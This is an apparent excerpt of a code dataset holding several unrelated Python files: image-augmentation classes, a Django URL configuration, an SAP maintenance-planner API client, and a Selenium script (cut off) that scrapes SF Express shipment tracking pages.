cv.getPerspectiveTransform(orig_pts - vectors, orig_pts)\n return cv.warpPerspective(img, m, dsize=img.shape[:2][::-1])\n\n\nclass SkewAugmenter(Augmenter):\n\n def __init__(self, direction=(0, 1, 2, 3), ratio=(0.0, 0.3)):\n super(SkewAugmenter, self).__init__()\n self.params = [direction, ratio]\n self.params_random = [RandomElement(direction), RandomFromRange(min(ratio), max(ratio))]\n self.name = 'sk'\n\n @staticmethod\n def transform(img, direction, ratio):\n\n if ratio == 0.0:\n return img\n\n height = img.shape[0]\n width = img.shape[1]\n offset = int((ratio / 2) * (height + width) / 2)\n\n if direction == 0:\n vectors = np.float32([[offset, 0], [0, 0], [-offset, 0]])\n orig_pts = np.float32([[0, 0], [width, 0], [width, height]])\n elif direction == 1:\n vectors = np.float32([[0, offset], [0, 0], [0, -offset]])\n orig_pts = np.float32([[width, 0], [width, height], [0, height]])\n elif direction == 2:\n vectors = np.float32([[-offset, 0], [0, 0], [offset, 0]])\n orig_pts = np.float32([[width, 0], [width, height], [0, height]])\n else:\n vectors = np.float32([[0, offset], [0, 0], [0, -offset]])\n orig_pts = np.float32([[0, 0], [width, 0], [width, height]])\n\n m = cv.getAffineTransform(orig_pts - vectors, orig_pts)\n return cv.warpAffine(img, m, dsize=img.shape[:2][::-1])\n\n\nclass CircleAugmenter(Augmenter):\n\n def __init__(self, shrink_ratios=(0.8, 0.9)):\n super(CircleAugmenter, self).__init__()\n self.params = [shrink_ratios]\n self.params_random = [RandomFromRange(min(shrink_ratios), max(shrink_ratios))]\n self.name = 'ci'\n\n @staticmethod\n def transform(img, shrink_ratio):\n center = (int(img.shape[1] / 2), int(img.shape[0] / 2))\n radius = int(min(img.shape[0], img.shape[1]) * 0.5 * shrink_ratio)\n circle = img * 0\n cv.circle(circle, center, radius, (1, 1, 1, 1), -1)\n img = img * circle\n crop = img[center[1] - radius:center[1] + radius, center[0] - radius:center[0] + radius]\n return crop\n\n\nclass PCAColorAugmenter(Augmenter):\n\n def __init__(self, ratio=(-0.1, -0.05, 0, 0.05, 0.1), eigen_vecs=None, eigen_vals=None):\n \"\"\"\n PCA color augmentation introduced in AlexNet. Default eigen vals and vecs are taken from:\n https://github.com/facebook/fb.resnet.torch/blob/master/datasets/imagenet.lua and they represent values\n calculated for a subset of ImageNet assuming BGR format.\n \"\"\"\n super(PCAColorAugmenter, self).__init__()\n self.params = [ratio]\n self.params_random = [RandomNormal(0, max(ratio))]\n self.name = 'pc'\n\n self.eigen_vecs = eigen_vecs\n if eigen_vecs is None:\n self.eigen_vecs = np.array(\n [[ 0.4203, -0.6948, -0.5836],\n [-0.8140, -0.0045, -0.5808],\n [ 0.4009, 0.7192, -0.5675]]\n )\n\n self.eigen_vals = eigen_vals\n if eigen_vals is None:\n self.eigen_vals = np.array(\n [0.0045, 0.0188, 0.2175]\n )\n\n def transform(self, img, ratio):\n\n if ratio == 0 or helper.is_mask(img):\n return img\n\n update = np.dot(self.eigen_vecs, np.expand_dims(np.multiply(self.eigen_vals, ratio), axis=1))\n update = np.int8(update.flatten() * 255)\n val = tuple(update.tolist()) + (0,)\n return cv.add(img, val)\n\n\nclass CropAugmenter(Augmenter):\n\n def __init__(self, scales=(0.5, 0.8, 1.0), x=(.0, 1.0), y=(.0, 1.0), rectangular=False):\n super(CropAugmenter, self).__init__()\n self.rectangular = rectangular\n self.name = 'cr'\n self.params = [scales, x, y]\n self.params_random = [RandomElement(scales),\n RandomFromRange(min(x), max(x)),\n RandomFromRange(min(y), max(y))]\n\n def transform(self, img, scale, x, y):\n crop_width = int(img.shape[1] * scale)\n crop_height = int(img.shape[0] * scale)\n if self.rectangular:\n crop_width = crop_height = min(crop_width, crop_height)\n crop_x = int((img.shape[1] - crop_width) * x)\n crop_y = int((img.shape[0] - crop_height) * y)\n crop = img[crop_y:crop_y + crop_height, crop_x:crop_x + crop_width].copy()\n return crop\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# MultiAugmenter\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass MultiAugmenter(object):\n\n def __init__(self, augmenters):\n self.augmenters = augmenters\n\n def augment_fixed(self, *images):\n return self.augment(images, 'augment_fixed')\n\n def augment_random(self, *images):\n res = self.augment(images, 'augment_random')\n return res[0][0], res[0][1]\n\n def augment(self, image, method):\n result = []\n for augmenter in self.augmenters:\n augmented = []\n input_ = result\n if not input_:\n input_ = [(image, '')]\n for img, name in input_:\n res = getattr(augmenter, method)(*img)\n for nimg, nname in [res]:\n augmented.append((nimg, name + (\"_\" if name else \"\") + nname))\n result = augmented\n\n if not self.augmenters:\n result.append((image, \"\"))\n\n return result\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Random params\n# ----------------------------------------------------------------------------------------------------------------------\n\nclass RandomElement(object):\n\n def __init__(self, elements):\n self.elements = elements\n\n def get(self):\n return random.choice(self.elements)\n\n\nclass RandomFromRange(object):\n\n def __init__(self, a, b, step=1):\n self.a = a\n self.b = b\n self.step = step\n if step != 1:\n elements = self.valid_elements()\n self.random_element = RandomElement(elements)\n self.get = self.random_element.get\n\n def get(self):\n if isinstance(self.a, int):\n return random.randint(self.a, self.b)\n else:\n return random.uniform(self.a, self.b)\n\n def valid_elements(self):\n elements = []\n value = self.a\n while value <= self.b:\n elements.append(value)\n value += self.step\n return elements\n\n\nclass RandomNormal(object):\n\n def __init__(self, mean, sigma):\n self.mean = mean\n self.sigma = sigma\n\n def get(self):\n return random.normalvariate(self.mean, self.sigma)\n\n\nclass RandomNormalFromRange(RandomFromRange):\n\n def __init__(self, a, b, step=1):\n super(RandomNormalFromRange, self).__init__(a, b, step)\n self.a = a\n self.b = b\n self.step = step\n # 3 sigma (covers 99.7% of samples)\n self.sigma = abs(b - a) / 3.0\n\n def get(self):\n val = random.normalvariate(self.a, self.sigma)\n if val < self.a:\n val = 2 * self.a - val\n if isinstance(self.a, int):\n val = int(val)\n if self.step != 1:\n elements = self.valid_elements()\n idx = np.abs(np.array(elements)-val).argmin()\n val = elements[idx]\n return val\n\n\ndef get_by_name(name):\n d = {\n \"copy\": CopyAugmenter,\n \"rotate\": RotateAugmenter,\n \"rotateangle\": RotateAngleAugmenter,\n \"flip\": FlipAugmenter,\n \"huedistortion\": HueDistortionAugmenter,\n \"saturationdistortion\": SaturationDistortionAugmenter,\n \"brightness\": BrightnessAugmenter,\n \"blur\": BlurAugmenter,\n \"noise\": NoiseAugmenter,\n \"perspective\": PerspectiveAugmenter,\n \"skew\": SkewAugmenter,\n \"circle\": CircleAugmenter,\n \"pcacolor\": PCAColorAugmenter,\n \"crop\": CropAugmenter,\n }\n return d[name.lower()]\n", "repo_name": "ambrzeski/aug", "sub_path": "augmenters.py", "file_name": "augmenters.py", "file_ext": "py", "file_size_in_byte": 15774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aug.helper.to_string", "line_number": 26, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 26, "usage_type": "name"}, {"api_name": "itertools.product", "line_number": 34, "usage_type": "call"}, {"api_name": "aug.helper.to_string", "line_number": 36, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 36, "usage_type": "name"}, {"api_name": "cv2.transpose", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 80, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.transpose", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 117, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 132, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 132, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 135, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 145, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 146, "usage_type": "attribute"}, {"api_name": "aug.helper.is_mask", "line_number": 161, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 161, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 164, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 167, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 171, "usage_type": "attribute"}, {"api_name": "aug.helper.is_mask", "line_number": 186, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 186, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 191, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 206, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 206, "usage_type": "name"}, {"api_name": "cv2.GaussianBlur", "line_number": 209, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 224, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 224, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 229, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 267, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 300, "usage_type": "call"}, {"api_name": "cv2.getAffineTransform", "line_number": 302, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 303, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 348, "usage_type": "call"}, {"api_name": "aug.helper.is_mask", "line_number": 354, "usage_type": "call"}, {"api_name": "aug.helper", "line_number": 354, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 358, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 360, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 430, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 446, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 448, "usage_type": "call"}, {"api_name": "random.normalvariate", "line_number": 466, "usage_type": "call"}, {"api_name": "random.normalvariate", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 487, "usage_type": "call"}]}
+{"seq_id": "69984855767", "text": "from django.urls import include, path\nfrom rest_framework_simplejwt.views import (TokenObtainPairView,\n TokenRefreshView)\n\nurlpatterns = [\n path('users/', include('clients.urls')),\n path('currencies', include('currency.urls')),\n path('transactions', include('transactions.urls')),\n path('accounts', include('accounts.urls')),\n path('silk/', include('silk.urls', namespace='silk')),\n path(\n 'auth/token/',\n TokenObtainPairView.as_view(),\n name='token_obtain_pair'\n ),\n path(\n 'auth/refresh/',\n TokenRefreshView.as_view(),\n name='token_refresh'\n ),\n]\n", "repo_name": "Boring-Mind/bank-transactions", "sub_path": "bank/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 661, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenObtainPairView", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "22720499164", "text": "#!/user/bin/env python3\n# coding: utf-8\n\nimport os\nimport pathlib\nimport re\nimport time\nfrom html import unescape\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nfrom lxml import etree\nfrom requests.auth import HTTPBasicAuth\nfrom requests.sessions import session\n\nfrom . import constants as C\nfrom .sap_api_common import _request, https_session\nfrom .sap_id_sso import _get_sso_endpoint_meta, sap_sso_login\n\n_MP_XSRF_TOKEN = None\n_MP_TRANSACTIONS = None\n\n\ndef auth_maintenance_planner():\n # Clear mp relevant cookies for avoiding unexpected responses.\n _clear_mp_cookies('maintenanceplanner')\n res = _request(C.URL_MAINTAINANCE_PLANNER)\n sig_re = re.compile('signature=(.*?);path=\\/\";location=\"(.*)\"')\n signature, redirect = re.search(sig_re, res.text).groups()\n\n # Essential cookies for the final callback\n mp_cookies = {\n 'signature': signature,\n 'fragmentAfterLogin': '',\n 'locationAfterLogin': '%2F'\n }\n\n MP_DOMAIN = C.URL_MAINTAINANCE_PLANNER.replace('https://', '')\n for k, v in mp_cookies.items():\n https_session.cookies.set(k, v, domain=MP_DOMAIN, path='/')\n\n res = _request(redirect)\n meta_re = re.compile(' ')\n raw_redirect = re.search(meta_re, res.text).group(1)\n\n endpoint = urljoin(res.url, unescape(raw_redirect))\n meta = {}\n while 'SAMLResponse' not in meta:\n endpoint, meta = _get_sso_endpoint_meta(endpoint, data=meta)\n _request(endpoint, data=meta)\n\n\ndef auth_userapps():\n \"\"\"Auth against userapps.support.sap.com\n \"\"\"\n _clear_mp_cookies('userapps')\n endpoint, meta = _get_sso_endpoint_meta(C.URL_USERAPPS)\n\n while endpoint != C.URL_USERAPPS:\n endpoint, meta = _get_sso_endpoint_meta(endpoint, data=meta)\n _request(endpoint, data=meta)\n\n # Reset Cache\n global _MP_XSRF_TOKEN\n global _MP_TRANSACTIONS\n _MP_XSRF_TOKEN = None\n _MP_TRANSACTIONS = None\n\n\ndef get_mp_user_details():\n url = urljoin(C.URL_MAINTAINANCE_PLANNER,\n '/MCP/MPHomePageController/getUserDetailsDisplay')\n params = {'_': int(time.time() * 1000)}\n user = _request(url, params=params).json()\n return user\n\n\ndef get_transactions():\n global _MP_TRANSACTIONS\n if _MP_TRANSACTIONS is not None:\n return _MP_TRANSACTIONS\n res = _mp_request(params={'action': 'getTransactions'})\n xml = unescape(res.text.replace('\\ufeff', ''))\n doc = BeautifulSoup(xml, features='lxml')\n _MP_TRANSACTIONS = [t.attrs for t in doc.find_all('mnp:transaction')]\n return _MP_TRANSACTIONS\n\n\ndef get_transaction_details(trans_id):\n params = {\n 'action': 'getMaintCycle',\n 'sub_action': 'load',\n 'call_from': 'transactions',\n 'session_id': trans_id\n }\n res = _mp_request(params=params)\n xml = unescape(res.text.replace('\\ufeff', ''))\n return xml\n\n\ndef get_transaction_stack_xml(trans_id, output_dir=None):\n params = {\n 'action': 'downloadFiles',\n 'sub_action': 'stack-plan',\n 'session_id': trans_id,\n }\n\n # Returns XML file with XML Element values using appropriate special character predefined entities (e.g. & instead of &)\n res = _mp_request(params=params)\n\n if output_dir is None:\n return res.text\n\n dest = pathlib.Path(output_dir)\n # content-disposition: attachment; filename=MP_XX_STACK.xml\n _, name = res.headers.get('content-disposition').split('filename=')\n dest = dest.joinpath(name)\n\n with open(dest, 'w') as f:\n f.write(res.text)\n\n\ndef get_stack_files_xml(trans_id):\n trans_name = _get_transaction_name(trans_id)\n request_xml = _build_mnp_xml(action='getStackFiles',\n call_for='download_stack_xml',\n sessionid=trans_id,\n trans_name=trans_name)\n\n res = _mp_request(data=request_xml)\n xml = unescape(res.text.replace('\\ufeff', ''))\n return xml\n\n\ndef get_download_files_xml(trans_id):\n trans_name = _get_transaction_name(trans_id)\n request_xml = _build_mnp_xml(action='postProcessStack',\n call_for='download_stack_xml',\n sessionid=trans_id,\n trans_name=trans_name)\n res = _mp_request(data=request_xml)\n xml = unescape(res.text.replace('\\ufeff', ''))\n return xml\n\n\ndef get_download_basket_files(trans_id):\n params = {\n 'action': 'getDownloadBasketFiles',\n 'session_id': trans_id,\n }\n res = _mp_request(params=params)\n xml = unescape(res.text.replace('\\ufeff', ''))\n return xml\n\n\ndef add_stack_download_files_to_basket(trans_id):\n '''\n POST data formart:\n\n \n \n \n \n \n \n \n \n '''\n params = {\n 'action': 'push2Db',\n 'session_id': trans_id,\n }\n xml = get_download_files_xml(trans_id)\n doc = etree.fromstring(xml.encode('utf-16'))\n stack_files = doc.xpath(\n '//mnp:entity[@id=\"stack_files\"]',\n namespaces={'mnp': 'http://xml.sap.com/2012/01/mnp'})\n if not stack_files:\n raise ValueError('stack files not found')\n\n request_xml = _build_mnp_xml(action='push2Db',\n call_for='download_stack_xml',\n sessionid=trans_id,\n entities=stack_files[0])\n res = _mp_request(params=params, data=request_xml)\n xml = unescape(res.text.replace('\\ufeff', ''))\n return xml\n\n\ndef get_download_basket_url_filename():\n download_items = get_download_basket_json()\n return [(i['DirectDownloadUrl'], i['ObjectName']) for i in download_items]\n\n\ndef get_download_basket_json():\n url = C.URL_SOFTWARE_CENTER_SERVICE + '/DownloadBasketItemSet'\n headers = {'Accept': 'application/json'}\n j = _request(url, headers=headers).json()\n\n results = j['d']['results']\n for r in results:\n r.pop('__metadata', None)\n return results\n\n\ndef get_transaction_id_by_name(name):\n transaction = _get_transaction('trans_name', name)\n return transaction['trans_id']\n\n\ndef get_transaction_id_by_display_id(display_id):\n transaction = _get_transaction('trans_display_id', display_id)\n return transaction['trans_id']\n\ndef get_transaction_filename_url(trans_id):\n xml = get_download_files_xml(trans_id)\n e = etree.fromstring(xml.encode('utf-16'))\n stack_files = e.xpath(\n '//mnp:entity[@id=\"stack_files\"]/mnp:entity',\n namespaces={'mnp': 'http://xml.sap.com/2012/01/mnp'})\n files = []\n for f in stack_files:\n file_id = C.URL_SOFTWARE_DOWNLOAD + '/file/' + f.get('id')\n file_name = f.get('label')\n files.append((file_id, file_name))\n return files\n\ndef fetch_download_files(display_id):\n params = {\n 'action': 'fetchFile',\n 'sub_action': 'download_xml',\n 'display_id': display_id,\n }\n\n res = _mp_request(params=params)\n xml = unescape(res.text.replace('\\ufeff', ''))\n e = etree.fromstring(xml.encode('utf-8'))\n files = e.xpath('./download/files/file')\n url_filename_list = [(f.find('url').text, f.find('name').text)\n for f in files]\n\n return url_filename_list\n\n\ndef clear_download_basket():\n download_items = get_download_basket_json()\n for item in download_items:\n object_id = item['ObjectKey']\n delete_item_in_download_basket(object_id)\n\n\ndef delete_item_in_download_basket(object_id):\n url = C.URL_SOFTWARE_CENTER_SERVICE + '/DownloadContentSet'\n params = {\n '_MODE': 'OBJDEL',\n 'OBJID': object_id,\n }\n\n _request(url, params=params)\n\n\n# Getting software download links and filenames via Legacy API,\n# which required SID username and password for Basic Authentication.\n# Usually we should use `fetch_download_files` instead.\ndef fetch_download_files_via_legacy_api(username, password, display_id):\n params = {\n 'action': 'fetchFile',\n 'sub_action': 'download_xml',\n 'display_id': display_id,\n }\n\n res = _request(C.URL_LEGACY_MP_API,\n params=params,\n auth=HTTPBasicAuth(username, password))\n xml = unescape(res.text.replace('\\ufeff', ''))\n e = etree.fromstring(xml.encode('utf-8'))\n files = e.xpath('./download/files/file')\n url_filename_list = [(f.find('url').text, f.find('name').text)\n for f in files]\n\n return url_filename_list\n\n\ndef _get_transaction_name(trans_id):\n transaction = _get_transaction('trans_id', trans_id)\n return transaction['trans_name']\n\n\ndef _get_transaction(key, value):\n transactions = get_transactions()\n trans = [t for t in transactions if t[key] == value]\n if not trans:\n raise KeyError(f'{key}: {value} not found in transactions')\n return trans[0]\n\n\ndef _mp_request(**kwargs):\n params = {\n '_': int(time.time() * 1000),\n }\n if 'params' in kwargs:\n params.update(kwargs['params'])\n kwargs.pop('params')\n\n if params.get('action') != 'getInitialData':\n kwargs['headers'] = {'xsrf-token': _xsrf_token()}\n\n kwargs['allow_redirects'] = False\n\n res = _request(C.URL_USERAPP_MP_SERVICE, params=params, **kwargs)\n if (res.status_code == 302\n and res.headers.get('location').startswith(C.URL_ACCOUNT)):\n if not _is_sso_session_active():\n raise Exception('Not logged in or session expired.'\n ' Please login with `sap_sso_login`')\n auth_userapps()\n res = _request(C.URL_USERAPP_MP_SERVICE, params=params, **kwargs)\n\n return res\n\n\ndef _build_mnp_xml(**params):\n namespace = 'http://xml.sap.com/2012/01/mnp'\n mnp = f'{{{namespace}}}'\n\n request_keys = ['action', 'trans_name', 'sub_action', 'navigation']\n request_attrs = {k: params.get(k, '') for k in request_keys}\n\n entity_keys = ['call_for', 'sessionid']\n entity_attrs = {k: params.get(k, '') for k in entity_keys}\n\n request = etree.Element(f'{mnp}request',\n nsmap={\"mnp\": namespace},\n attrib=request_attrs)\n entity = etree.SubElement(request, f'{mnp}entity', attrib=entity_attrs)\n entity.text = ''\n\n if 'entities' in params and type(params['entities']) is etree._Element:\n entity.append(params['entities'])\n\n xml_str = etree.tostring(request, pretty_print=True)\n return xml_str\n\n\ndef _xsrf_token():\n global _MP_XSRF_TOKEN\n if _MP_XSRF_TOKEN:\n return _MP_XSRF_TOKEN\n\n res = _mp_request(params={'action': 'getInitialData'})\n\n _MP_XSRF_TOKEN = res.headers.get('xsrf-token')\n return _MP_XSRF_TOKEN\n\n\ndef _clear_mp_cookies(startswith):\n for domain in https_session.cookies.list_domains():\n if domain.startswith(startswith):\n https_session.cookies.clear(domain=domain)\n\n\ndef _is_sso_session_active():\n try:\n # Account information\n _request(C.URL_ACCOUNT_ATTRIBUTES).json()\n except Exception as e:\n return False\n\n return True\n", "repo_name": "sap-linuxlab/community.sap_launchpad", "sub_path": "plugins/module_utils/sap_launchpad_maintenance_planner_runner.py", "file_name": "sap_launchpad_maintenance_planner_runner.py", "file_ext": "py", "file_size_in_byte": 11561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sap_api_common._request", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.search", "line_number": 29, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies.set", "line_number": 40, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sap_api_common.https_session", "line_number": 40, "usage_type": "name"}, {"api_name": "sap_api_common._request", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 46, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 46, "usage_type": "call"}, {"api_name": "sap_id_sso._get_sso_endpoint_meta", "line_number": 49, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 50, "usage_type": "call"}, {"api_name": "sap_id_sso._get_sso_endpoint_meta", "line_number": 57, "usage_type": "call"}, {"api_name": "sap_id_sso._get_sso_endpoint_meta", "line_number": 60, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 61, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 71, "usage_type": "call"}, {"api_name": "time.time", "line_number": 73, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 74, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 83, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 97, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 114, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 131, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 142, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 152, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 174, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 174, "usage_type": "name"}, {"api_name": "html.unescape", "line_number": 186, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 198, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 217, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 217, "usage_type": "name"}, {"api_name": "html.unescape", "line_number": 236, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 237, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 237, "usage_type": "name"}, {"api_name": "sap_api_common._request", "line_number": 259, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 272, "usage_type": "call"}, {"api_name": "requests.auth.HTTPBasicAuth", "line_number": 274, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 275, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 276, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 276, "usage_type": "name"}, {"api_name": "time.time", "line_number": 299, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 310, "usage_type": "call"}, {"api_name": "sap_api_common._request", "line_number": 317, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 332, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 332, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 335, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 335, "usage_type": "name"}, {"api_name": "lxml.etree._Element", "line_number": 338, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 338, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 341, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 341, "usage_type": "name"}, {"api_name": "sap_api_common.https_session.cookies.list_domains", "line_number": 357, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies", "line_number": 357, "usage_type": "attribute"}, {"api_name": "sap_api_common.https_session", "line_number": 357, "usage_type": "name"}, {"api_name": "sap_api_common.https_session.cookies.clear", "line_number": 359, "usage_type": "call"}, {"api_name": "sap_api_common.https_session.cookies", "line_number": 359, "usage_type": "attribute"}, {"api_name": "sap_api_common.https_session", "line_number": 359, "usage_type": "name"}, {"api_name": "sap_api_common._request", "line_number": 365, "usage_type": "call"}]}
+{"seq_id": "22047657622", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\nimport time\n\n\n\ndriver = webdriver.Chrome(executable_path=\"D:\\DEV\\chromedriver.exe\")\n# driver.get(\"https://www.sf-express.com/cn/sc/dynamic_function/waybill/#search/bill-number/291305897906\")\ndriver.get(\"https://www.sf-express.com/cn/sc/dynamic_function/waybill/#search/bill-number/SF1071817875791,SF1071817875904,SF1071817875861,SF1071817875959,288218304352,SF1071817875898,SF1071817875782,288218304264,SF1071817875870,SF1071817875825,SF1071817876025,SF1071817876016,SF1071817876034,SF1071817876122,SF1071817876061,SF1071817876140,SF1071817876104,SF1071817876186,SF1071817876201,288313684364\")\n\n\ntry:\n\n deliveries = WebDriverWait(driver, 15).until(\n EC.presence_of_all_elements_located((By.XPATH, \"//div[@class='delivery-wrapper']/div[@class='delivery']\"))\n )\n\n # open_map_checkbox = WebDriverWait(driver, 3).until(\n # EC.presence_of_element_located((By.XPATH, \"//div[@class='fr openMapModel']/input\"))\n # )\n # open_map_checkbox.click()\n driver.find_element_by_xpath(\"//div[@class='fr openMapModel']/input\").click()\n\n for index, delivery in enumerate(deliveries):\n\n bill_num = delivery.find_element_by_xpath(\".//div[@class='bill-num']/span[@class='number']\").text\n print(\"===================={}、{}==================\".format(index + 1, bill_num))\n print(bill_num)\n\n text = 